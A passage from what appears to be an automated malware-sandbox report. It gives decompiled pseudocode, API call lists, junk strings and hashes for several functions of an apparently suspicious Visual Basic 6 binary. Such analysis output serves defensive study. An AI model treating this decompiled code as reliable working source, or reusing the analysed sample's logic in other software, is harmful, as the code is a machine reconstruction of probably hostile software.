				_v64 = 0xa;
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v100;
				asm("fild dword [ebp-0x84]");
				_v140 = _t149;
				_v80 = _v140;
				_t104 =  *((intOrPtr*)( *_v112 + 0x130))(_v112, _t124, 0x10, 0x10, 0x10, _t97,  *((intOrPtr*)(_t124 + 0x314))( *_v132));
				asm("fclex");
				_v116 = _t104;
				if(_v116 >= 0) {
					_v144 = _v144 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x40eb80);
					_push(_v112);
					_push(_v116);
					L00401856();
					_v144 = _t104;
				}
				_push( &_v32);
				_push( &_v28);
				_push(2);
				L00401826();
				if( *0x41b010 != 0) {
					_v148 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v148 = 0x41b010;
				}
				_t110 =  &_v28;
				L00401862();
				_v104 = _t110;
				_t113 =  *((intOrPtr*)( *_v104 + 0x16c))(_v104, _t110,  *((intOrPtr*)( *((intOrPtr*)( *_v148)) + 0x2fc))( *_v148));
				asm("fclex");
				_v108 = _t113;
				if(_v108 >= 0) {
					_v152 = _v152 & 0x00000000;
				} else {
					_push(0x16c);
					_push(0x40eae4);
					_push(_v104);
					_push(_v108);
					L00401856();
					_v152 = _t113;
				}
				L00401850();
				asm("wait");
				_push(0x418ca7);
				return _t113;
			}

0x004189c2
0x004189c7
0x004189d2
0x004189d3
0x004189df
0x004189e7
0x004189ea
0x004189f1
0x004189f8
0x004189ff
0x00418a02
0x00418a03
0x00418a0d
0x00418a12
0x00418a13
0x00418a18
0x00418a1f
0x00418a25
0x00418a2c
0x00418a34
0x00418a3f
0x00418a41
0x00418a46
0x00418a46
0x00418a52
0x00418a6c
0x00418a54
0x00418a54
0x00418a59
0x00418a5e
0x00418a63
0x00418a63
0x00418a87
0x00418a8b
0x00418a90
0x00418a9f
0x00418aa5
0x00418aa7
0x00418aae
0x00418aca
0x00418ab0
0x00418ab0
0x00418ab5
0x00418aba
0x00418abd
0x00418ac0
0x00418ac5
0x00418ac5
0x00418ad5
0x00418aef
0x00418ad7
0x00418ad7
0x00418adc
0x00418ae1
0x00418ae6
0x00418ae6
0x00418b00
0x00418b0a
0x00418b0e
0x00418b13
0x00418b16
0x00418b1d
0x00418b24
0x00418b2b
0x00418b32
0x00418b39
0x00418b43
0x00418b4d
0x00418b4e
0x00418b4f
0x00418b50
0x00418b54
0x00418b5e
0x00418b5f
0x00418b60
0x00418b61
0x00418b65
0x00418b6f
0x00418b70
0x00418b71
0x00418b72
0x00418b77
0x00418b7d
0x00418b83
0x00418b90
0x00418b9b
0x00418ba1
0x00418ba3
0x00418baa
0x00418bc9
0x00418bac
0x00418bac
0x00418bb1
0x00418bb6
0x00418bb9
0x00418bbc
0x00418bc1
0x00418bc1
0x00418bd3
0x00418bd7
0x00418bd8
0x00418bda
0x00418be9
0x00418c06
0x00418beb
0x00418beb
0x00418bf0
0x00418bf5
0x00418bfa
0x00418bfa
0x00418c2a
0x00418c2e
0x00418c33
0x00418c3e
0x00418c44
0x00418c46
0x00418c4d
0x00418c6c
0x00418c4f
0x00418c4f
0x00418c54
0x00418c59
0x00418c5c
0x00418c5f
0x00418c64
0x00418c64
0x00418c76
0x00418c7b
0x00418c7c
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 004189DF
#574.MSVBVM60(00000002,?,?,?,?,?,?,?,?,004015E6), ref: 00418A03
__vbaStrMove.MSVBVM60(00000002,?,?,?,?,?,?,?,?,004015E6), ref: 00418A0D
__vbaStrCmp.MSVBVM60(0040F0AC,00000000,00000002,?,?,?,?,?,?,?,?,004015E6), ref: 00418A18
__vbaFreeStr.MSVBVM60(0040F0AC,00000000,00000002,?,?,?,?,?,?,?,?,004015E6), ref: 00418A2C
__vbaFreeVar.MSVBVM60(0040F0AC,00000000,00000002,?,?,?,?,?,?,?,?,004015E6), ref: 00418A34
#532.MSVBVM60(sesquiquartile,0040F0AC,00000000,00000002,?,?,?,?,?,?,?,?,004015E6), ref: 00418A46
__vbaNew2.MSVBVM60(0040F3CC,p"w,0040F0AC,00000000,00000002,?,?,?,?,?,?,?,?,004015E6), ref: 00418A5E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00418A8B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EA8C,000000D0), ref: 00418AC0
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 00418AE1
__vbaObjSet.MSVBVM60(?,00000000), ref: 00418B0E
__vbaChkstk.MSVBVM60(?,00000000), ref: 00418B43
__vbaChkstk.MSVBVM60(?,00000000), ref: 00418B54
__vbaChkstk.MSVBVM60(?,00000000), ref: 00418B65
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EB80,00000130,?,?,00000000), ref: 00418BBC
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 00418BDA
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 00418BF5
__vbaObjSet.MSVBVM60(?,00000000), ref: 00418C2E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAE4,0000016C), ref: 00418C5F
__vbaFreeObj.MSVBVM60(00000000,?,0040EAE4,0000016C), ref: 00418C76

Strings

p"w, xrefs: 00418A4B, 00418A54, 00418A63, 00418A6C, 00418ACE, 00418AD7, 00418AE6, 00418AEF, 00418BE2, 00418BEB, 00418BFA, 00418C06
sesquiquartile, xrefs: 00418A41

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$ChkstkFree$CheckHresultNew2$#532#574ListMove
String ID: p"w$sesquiquartile
API String ID: 2635709100-3021719204
Opcode ID: e4413dcf6d831574c13bddd1767785397d76fc1f183178969548ada34af69131
Instruction ID: 6fcb406d35efd072014fcb695ef49fa09bfd39bbc1864ff8bfd8e83d002ef7ff
Opcode Fuzzy Hash: e4413dcf6d831574c13bddd1767785397d76fc1f183178969548ada34af69131
Instruction Fuzzy Hash: 1B811571E002089FDB10EFA1C845BDEBBB5FF08704F20846AE519BB2A1DB795985DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041543E, Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0041543E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v32;
				void* _v36;
				signed int _v40;
				intOrPtr _v48;
				char _v56;
				char _v64;
				char _v72;
				char* _v80;
				intOrPtr _v88;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				long long _v136;
				signed int _v140;
				signed int* _v144;
				signed int _v148;
				signed int _v152;
				signed char _t77;
				char* _t80;
				void* _t84;
				void* _t86;
				intOrPtr _t87;
				long long _t90;

				_t87 = _t86 - 0xc;
				 *[fs:0x0] = _t87;
				L004015E0();
				_v16 = _t87;
				_v12 = 0x401390;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4015e6, _t84);
				_t80 =  &_v32;
				L00401820();
				_v64 = 0x80020004;
				_v72 = 0xa;
				_v48 = 0x80020004;
				_v56 = 0xa;
				_push( &_v72);
				_t77 =  &_v56;
				_push(_t77);
				_push(_t80);
				_push(_t80);
				_v56 =  *0x401388;
				_t90 =  *0x401380;
				_push(_t80);
				_push(_t80);
				_v64 = _t90;
				asm("fld1");
				_push(_t80);
				_push(_t80);
				_v72 = _t90;
				L0040177E();
				L004017C6();
				_v136 = _t90;
				asm("fchs");
				asm("fnstsw ax");
				if((_t77 & 0x0000000d) != 0) {
					return __imp____vbaFPException();
				}
				L004017C6();
				asm("fcomp qword [ebp-0x84]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags == 0) {
					_t19 =  &_v140;
					 *_t19 = _v140 & 0x00000000;
					__eflags =  *_t19;
				} else {
					_v140 = 1;
				}
				_v140 =  ~_v140;
				_v108 = __ax;
				__eax =  &_v72;
				_push( &_v72);
				__eax =  &_v56;
				_push( &_v56);
				_push(2);
				L004017BA();
				__esp = __esp + 0xc;
				__eax = _v108;
				__eflags = __eax;
				if(__eax == 0) {
					_v48 = 2;
					_v56 = 2;
					__eax =  &_v56;
					_push( &_v56);
					L00401778();
					L00401814();
					L00401838();
					_v80 = L"Plutonic7";
					_v88 = 8;
					L004017AE();
					__eax =  &_v56;
					_push(__eax);
					L0040176C();
					L00401814();
					_push(__eax);
					_push(L"String");
					L00401772();
					__eax =  ~__eax;
					asm("sbb eax, eax");
					__eax =  ~__eax;
					_v108 = __ax;
					L0040182C();
					L00401838();
					__eax = _v108;
					__eflags = __eax;
					if(__eax != 0) {
						__eflags =  *0x41b2d4;
						if( *0x41b2d4 != 0) {
							_v144 = 0x41b2d4;
						} else {
							_push(0x41b2d4);
							_push(0x40ed14);
							L0040185C();
							_v144 = 0x41b2d4;
						}
						_v144 =  *_v144;
						_v108 =  *_v144;
						__eax =  &_v40;
						_v108 =  *_v108;
						__eax =  *((intOrPtr*)( *_v108 + 0x1c))(_v108,  &_v40);
						asm("fclex");
						_v112 = __eax;
						__eflags = _v112;
						if(_v112 >= 0) {
							_t54 =  &_v148;
							 *_t54 = _v148 & 0x00000000;
							__eflags =  *_t54;
						} else {
							_push(0x1c);
							_push(0x40ed04);
							_push(_v108);
							_push(_v112);
							L00401856();
							_v148 = __eax;
						}
						__eax = _v40;
						_v116 = _v40;
						_v116 =  *_v116;
						__eax =  *((intOrPtr*)( *_v116 + 0x50))(_v116);
						asm("fclex");
						_v120 = __eax;
						__eflags = _v120;
						if(_v120 >= 0) {
							_t66 =  &_v152;
							 *_t66 = _v152 & 0x00000000;
							__eflags =  *_t66;
						} else {
							_push(0x50);
							_push(0x40edc0);
							_push(_v116);
							_push(_v120);
							L00401856();
							_v152 = __eax;
						}
						L00401850();
					}
				}
				asm("wait");
				_push(0x4156b9);
				L0040182C();
				L0040182C();
				return __eax;
			}

0x00415441
0x00415450
0x0041545c
0x00415464
0x00415467
0x0041546e
0x0041547d
0x00415483
0x00415486
0x0041548b
0x00415492
0x00415499
0x004154a0
0x004154aa
0x004154ab
0x004154ae
0x004154b5
0x004154b6
0x004154b7
0x004154ba
0x004154c0
0x004154c1
0x004154c2
0x004154c5
0x004154c7
0x004154c8
0x004154c9
0x004154cc
0x004154d1
0x004154d6
0x004154e2
0x004154e4
0x004154e8
0x004015ec
0x004015ec
0x004154ee
0x004154f3
0x004154f9
0x004154fb
0x004154fc
0x0041550a
0x0041550a
0x0041550a
0x004154fe
0x004154fe
0x004154fe
0x00415517
0x00415519
0x0041551d
0x00415520
0x00415521
0x00415524
0x00415525
0x00415527
0x0041552c
0x0041552f
0x00415533
0x00415535
0x0041553c
0x00415543
0x0041554a
0x0041554d
0x0041554e
0x00415558
0x00415560
0x00415565
0x0041556c
0x00415579
0x0041557e
0x00415581
0x00415582
0x0041558c
0x00415591
0x00415592
0x00415597
0x0041559c
0x0041559e
0x004155a2
0x004155a4
0x004155ab
0x004155b3
0x004155b8
0x004155bc
0x004155be
0x004155c4
0x004155cb
0x004155e8
0x004155cd
0x004155cd
0x004155d2
0x004155d7
0x004155dc
0x004155dc
0x004155f8
0x004155fa
0x004155fd
0x00415604
0x00415609
0x0041560c
0x0041560e
0x00415611
0x00415615
0x00415631
0x00415631
0x00415631
0x00415617
0x00415617
0x00415619
0x0041561e
0x00415621
0x00415624
0x00415629
0x00415629
0x00415638
0x0041563b
0x00415641
0x00415646
0x00415649
0x0041564b
0x0041564e
0x00415652
0x0041566e
0x0041566e
0x0041566e
0x00415654
0x00415654
0x00415656
0x0041565b
0x0041565e
0x00415661
0x00415666
0x00415666
0x00415678
0x00415678
0x004155be
0x0041567d
0x0041567e
0x004156ab
0x004156b3
0x004156b8

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 0041545C
__vbaStrCopy.MSVBVM60(?,?,?,?,004015E6), ref: 00415486
#678.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 004154CC
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 004154D1
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 004154EE
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A), ref: 00415527
#536.MSVBVM60(00000002), ref: 0041554E
__vbaStrMove.MSVBVM60(00000002), ref: 00415558
__vbaFreeVar.MSVBVM60(00000002), ref: 00415560
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,00000002), ref: 00415579
#591.MSVBVM60(00000002,?,?,?,?,?,?,?,00000002), ref: 00415582
__vbaStrMove.MSVBVM60(00000002,?,?,?,?,?,?,?,00000002), ref: 0041558C
__vbaStrCmp.MSVBVM60(String,00000000,00000002,?,?,?,?,?,?,?,00000002), ref: 00415597
__vbaFreeStr.MSVBVM60(String,00000000,00000002,?,?,?,?,?,?,?,00000002), ref: 004155AB
__vbaFreeVar.MSVBVM60(String,00000000,00000002,?,?,?,?,?,?,?,00000002), ref: 004155B3
__vbaNew2.MSVBVM60(0040ED14,0041B2D4,String,00000000,00000002,?,?,?,?,?,?,?,00000002), ref: 004155D7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040ED04,0000001C,?,?,?,?,?,?,?,?,?,?,?,String), ref: 00415624
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EDC0,00000050,?,?,?,?,?,?,?,?,?,?,?,String), ref: 00415661
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,String,00000000,00000002), ref: 00415678
__vbaFreeStr.MSVBVM60(004156B9,String,00000000,00000002,?,?,?,?,?,?,?,00000002), ref: 004156AB
__vbaFreeStr.MSVBVM60(004156B9,String,00000000,00000002,?,?,?,?,?,?,?,00000002), ref: 004156B3

Strings

Plutonic7, xrefs: 00415565
String, xrefs: 00415592

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#536#591#678ChkstkCopyListNew2
String ID: Plutonic7$String
API String ID: 583597361-3153733959
Opcode ID: 75f261b225c1e809373e0b2010d5fd050c01c8685ae41f804cbc2f5e260fd008
Instruction ID: bc1d759a433e87257d0ffaa5ba6e49d9385ab6923496a435e5e04aaf7ec70b5a
Opcode Fuzzy Hash: 75f261b225c1e809373e0b2010d5fd050c01c8685ae41f804cbc2f5e260fd008
Instruction Fuzzy Hash: 8E614A71900209EBDB00EFA1C985BEDBBB9FF04704F60816AF009B71A1DB785A85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004143B6, Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E004143B6(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				long long* _v12;
				short _v24;
				void* _v40;
				void* _v44;
				intOrPtr _v52;
				char _v60;
				intOrPtr _v68;
				char _v76;
				signed int _v84;
				intOrPtr _v92;
				void* _v112;
				void* _v116;
				signed int _v120;
				intOrPtr* _v124;
				signed int _v128;
				signed int _v136;
				intOrPtr* _v140;
				signed int _v144;
				intOrPtr* _v148;
				signed int _v152;
				signed int _v156;
				char* _t92;
				signed int _t96;
				signed int _t102;
				signed int _t107;
				short _t108;
				long long* _t130;
				long long _t139;

				_push(0x4015e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t130;
				L004015E0();
				_v12 = _t130;
				_v8 = 0x401328;
				_v68 = 0x80020004;
				_v76 = 0xa;
				_v52 = 0x80020004;
				_v60 = 0xa;
				_push( &_v76);
				_push( &_v60);
				_t139 =  *0x401320;
				 *_t130 = _t139;
				asm("fld1");
				 *_t130 = _t139;
				asm("fld1");
				 *_t130 = _t139;
				L004017C0();
				L004017C6();
				asm("fcomp qword [0x401318]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags == 0) {
					_t10 =  &_v136;
					 *_t10 = _v136 & 0x00000000;
					__eflags =  *_t10;
				} else {
					_v136 = 1;
				}
				_v116 =  ~_v136;
				_push( &_v76);
				_push( &_v60);
				_push(2);
				L004017BA();
				if(_v116 != 0) {
					_v84 = L"CRAPPER";
					_v92 = 8;
					L004017AE();
					_push( &_v60);
					_push( &_v76);
					L004017B4();
					L00401802();
					L00401838();
				}
				if( *0x41b010 != 0) {
					_v140 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v140 = 0x41b010;
				}
				_t92 =  &_v44;
				L00401862();
				_v116 = _t92;
				_v84 = _v84 & 0x00000000;
				_v92 = 2;
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t96 =  *((intOrPtr*)( *_v116 + 0x17c))(_v116, 0x10, _t92,  *((intOrPtr*)( *((intOrPtr*)( *_v140)) + 0x338))( *_v140));
				asm("fclex");
				_v120 = _t96;
				if(_v120 >= 0) {
					_t45 =  &_v144;
					 *_t45 = _v144 & 0x00000000;
					__eflags =  *_t45;
				} else {
					_push(0x17c);
					_push(0x40eae4);
					_push(_v116);
					_push(_v120);
					L00401856();
					_v144 = _t96;
				}
				L00401850();
				if( *0x41b2d4 != 0) {
					_v148 = 0x41b2d4;
				} else {
					_push(0x41b2d4);
					_push(0x40ed14);
					L0040185C();
					_v148 = 0x41b2d4;
				}
				_v116 =  *_v148;
				_t102 =  *((intOrPtr*)( *_v116 + 0x14))(_v116,  &_v44);
				asm("fclex");
				_v120 = _t102;
				if(_v120 >= 0) {
					_t61 =  &_v152;
					 *_t61 = _v152 & 0x00000000;
					__eflags =  *_t61;
				} else {
					_push(0x14);
					_push(0x40ed04);
					_push(_v116);
					_push(_v120);
					L00401856();
					_v152 = _t102;
				}
				_v124 = _v44;
				_t107 =  *((intOrPtr*)( *_v124 + 0x70))(_v124,  &_v112);
				asm("fclex");
				_v128 = _t107;
				if(_v128 >= 0) {
					_t74 =  &_v156;
					 *_t74 = _v156 & 0x00000000;
					__eflags =  *_t74;
				} else {
					_push(0x70);
					_push(0x40ed24);
					_push(_v124);
					_push(_v128);
					L00401856();
					_v156 = _t107;
				}
				_t108 = _v112;
				_v24 = _t108;
				L00401850();
				asm("wait");
				_push(0x41464f);
				L00401838();
				return _t108;
			}

0x004143bb
0x004143c6
0x004143c7
0x004143d3
0x004143db
0x004143de
0x004143e5
0x004143ec
0x004143f3
0x004143fa
0x00414404
0x00414408
0x00414409
0x00414411
0x00414414
0x00414418
0x0041441b
0x0041441f
0x00414422
0x00414427
0x0041442c
0x00414432
0x00414434
0x00414435
0x00414443
0x00414443
0x00414443
0x00414437
0x00414437
0x00414437
0x00414452
0x00414459
0x0041445d
0x0041445e
0x00414460
0x0041446e
0x00414470
0x00414477
0x00414484
0x0041448c
0x00414490
0x00414491
0x0041449c
0x004144a4
0x004144a4
0x004144b0
0x004144cd
0x004144b2
0x004144b2
0x004144b7
0x004144bc
0x004144c1
0x004144c1
0x004144f1
0x004144f5
0x004144fa
0x004144fd
0x00414501
0x0041450b
0x00414515
0x00414516
0x00414517
0x00414518
0x00414521
0x00414527
0x00414529
0x00414530
0x0041454f
0x0041454f
0x0041454f
0x00414532
0x00414532
0x00414537
0x0041453c
0x0041453f
0x00414542
0x00414547
0x00414547
0x00414559
0x00414565
0x00414582
0x00414567
0x00414567
0x0041456c
0x00414571
0x00414576
0x00414576
0x00414594
0x004145a3
0x004145a6
0x004145a8
0x004145af
0x004145cb
0x004145cb
0x004145cb
0x004145b1
0x004145b1
0x004145b3
0x004145b8
0x004145bb
0x004145be
0x004145c3
0x004145c3
0x004145d5
0x004145e4
0x004145e7
0x004145e9
0x004145f0
0x0041460c
0x0041460c
0x0041460c
0x004145f2
0x004145f2
0x004145f4
0x004145f9
0x004145fc
0x004145ff
0x00414604
0x00414604
0x00414613
0x00414617
0x0041461e
0x00414623
0x00414624
0x00414649
0x0041464e

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 004143D3
#677.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 00414422
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 00414427
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A), ref: 00414460
__vbaVarDup.MSVBVM60 ref: 00414484
#666.MSVBVM60(?,?), ref: 00414491
__vbaVarMove.MSVBVM60(?,?), ref: 0041449C
__vbaFreeVar.MSVBVM60(?,?), ref: 004144A4
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 004144BC
__vbaObjSet.MSVBVM60(?,00000000), ref: 004144F5
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041450B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAE4,0000017C), ref: 00414542
__vbaFreeObj.MSVBVM60(00000000,?,0040EAE4,0000017C), ref: 00414559
__vbaNew2.MSVBVM60(0040ED14,0041B2D4), ref: 00414571
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040ED04,00000014), ref: 004145BE
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040ED24,00000070), ref: 004145FF
__vbaFreeObj.MSVBVM60(00000000,?,0040ED24,00000070), ref: 0041461E
__vbaFreeVar.MSVBVM60(0041464F), ref: 00414649

Strings

CRAPPER, xrefs: 00414470
p"w, xrefs: 004144A9, 004144B2, 004144C1, 004144CD

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$ChkstkNew2$#666#677ListMove
String ID: CRAPPER$p"w
API String ID: 4200952096-702701744
Opcode ID: d2027b3eb62afb7d6eee3f46c354050529226a6ebc1db7c5054083d5cad567ee
Instruction ID: ef264343580bf187c603aeef58e93bdf023ec23316dc820e4faa989d01d48ddc
Opcode Fuzzy Hash: d2027b3eb62afb7d6eee3f46c354050529226a6ebc1db7c5054083d5cad567ee
Instruction Fuzzy Hash: 3871F371900218EBDB10EFA1C845BDDBBB8FF08708F2045AEE105B72A1DB795A859F59

Uniqueness

Uniqueness Score: -1.00%

Function 004177EA, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E004177EA(void* __ebx, void* __edi, void* __esi, char __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				short _v32;
				char _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr* _v96;
				signed int _v100;
				intOrPtr* _v104;
				signed int _v108;
				intOrPtr* _v120;
				signed int _v124;
				intOrPtr* _v128;
				signed int _v132;
				intOrPtr* _v136;
				char _v140;
				char _v144;
				signed int _v148;
				char* _t86;
				signed int _t89;
				char* _t93;
				signed int _t97;
				char* _t101;
				signed int _t108;
				char* _t110;
				intOrPtr _t122;
				void* _t133;
				void* _t135;
				intOrPtr _t136;
				char _t144;

				_t144 = __fp0;
				_t136 = _t135 - 0xc;
				 *[fs:0x0] = _t136;
				L004015E0();
				_v16 = _t136;
				_v12 = 0x4014e0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x7c,  *[fs:0x0], 0x4015e6, _t133);
				L004016BE();
				L00401814();
				if( *0x41b010 != 0) {
					_v120 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v120 = 0x41b010;
				}
				_t86 =  &_v36;
				L00401862();
				_v96 = _t86;
				_t89 =  *((intOrPtr*)( *_v96 + 0x194))(_v96, _t86,  *((intOrPtr*)( *((intOrPtr*)( *_v120)) + 0x308))( *_v120));
				asm("fclex");
				_v100 = _t89;
				if(_v100 >= 0) {
					_v124 = _v124 & 0x00000000;
				} else {
					_push(0x194);
					_push(0x40eed8);
					_push(_v96);
					_push(_v100);
					L00401856();
					_v124 = _t89;
				}
				L00401850();
				if( *0x41b010 != 0) {
					_v128 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v128 = 0x41b010;
				}
				_t93 =  &_v36;
				L00401862();
				_v96 = _t93;
				_t97 =  *((intOrPtr*)( *_v96 + 0x158))(_v96,  &_v92, _t93,  *((intOrPtr*)( *((intOrPtr*)( *_v128)) + 0x300))( *_v128));
				asm("fclex");
				_v100 = _t97;
				if(_v100 >= 0) {
					_v132 = _v132 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x40eae4);
					_push(_v96);
					_push(_v100);
					L00401856();
					_v132 = _t97;
				}
				if( *0x41b010 != 0) {
					_v136 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v136 = 0x41b010;
				}
				_t122 =  *((intOrPtr*)( *_v136));
				_t101 =  &_v40;
				L00401862();
				_v104 = _t101;
				_v80 = 0x80020004;
				_v88 = 0xa;
				_v64 = 0x80020004;
				_v72 = 0xa;
				_v48 = 0x80020004;
				_v56 = 0xa;
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v140 = _v92;
				asm("fild dword [ebp-0x88]");
				_v144 = _t144;
				_v92 = _v144;
				_t108 =  *((intOrPtr*)( *_v104 + 0xf4))(_v104, _t122, 0x10, 0x10, 0x10, _t101,  *((intOrPtr*)(_t122 + 0x344))( *_v136));
				asm("fclex");
				_v108 = _t108;
				if(_v108 >= 0) {
					_v148 = _v148 & 0x00000000;
				} else {
					_push(0xf4);
					_push(0x40eb3c);
					_push(_v104);
					_push(_v108);
					L00401856();
					_v148 = _t108;
				}
				_push( &_v40);
				_t110 =  &_v36;
				_push(_t110);
				_push(2);
				L00401826();
				_v32 = 0x68ac;
				asm("wait");
				_push(0x417a8d);
				L0040182C();
				return _t110;
			}

0x004177ea
0x004177ed
0x004177fc
0x00417806
0x0041780e
0x00417811
0x00417818
0x00417827
0x0041782a
0x00417834
0x00417840
0x0041785a
0x00417842
0x00417842
0x00417847
0x0041784c
0x00417851
0x00417851
0x00417875
0x00417879
0x0041787e
0x00417889
0x0041788f
0x00417891
0x00417898
0x004178b4
0x0041789a
0x0041789a
0x0041789f
0x004178a4
0x004178a7
0x004178aa
0x004178af
0x004178af
0x004178bb
0x004178c7
0x004178e1
0x004178c9
0x004178c9
0x004178ce
0x004178d3
0x004178d8
0x004178d8
0x004178fc
0x00417900
0x00417905
0x00417914
0x0041791a
0x0041791c
0x00417923
0x0041793f
0x00417925
0x00417925
0x0041792a
0x0041792f
0x00417932
0x00417935
0x0041793a
0x0041793a
0x0041794a
0x00417967
0x0041794c
0x0041794c
0x00417951
0x00417956
0x0041795b
0x0041795b
0x00417981
0x0041798b
0x0041798f
0x00417994
0x00417997
0x0041799e
0x004179a5
0x004179ac
0x004179b3
0x004179ba
0x004179c4
0x004179ce
0x004179cf
0x004179d0
0x004179d1
0x004179d5
0x004179df
0x004179e0
0x004179e1
0x004179e2
0x004179e6
0x004179f0
0x004179f1
0x004179f2
0x004179f3
0x004179f8
0x004179fe
0x00417a04
0x00417a11
0x00417a1c
0x00417a22
0x00417a24
0x00417a2b
0x00417a4a
0x00417a2d
0x00417a2d
0x00417a32
0x00417a37
0x00417a3a
0x00417a3d
0x00417a42
0x00417a42
0x00417a54
0x00417a55
0x00417a58
0x00417a59
0x00417a5b
0x00417a63
0x00417a69
0x00417a6a
0x00417a87
0x00417a8c

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 00417806
#611.MSVBVM60(?,?,?,?,004015E6), ref: 0041782A
__vbaStrMove.MSVBVM60(?,?,?,?,004015E6), ref: 00417834
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,?,?,?,004015E6), ref: 0041784C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417879
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EED8,00000194), ref: 004178AA
__vbaFreeObj.MSVBVM60(00000000,?,0040EED8,00000194), ref: 004178BB
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 004178D3
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417900
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAE4,00000158), ref: 00417935
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 00417956
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041798F
__vbaChkstk.MSVBVM60(?,00000000), ref: 004179C4
__vbaChkstk.MSVBVM60(?,00000000), ref: 004179D5
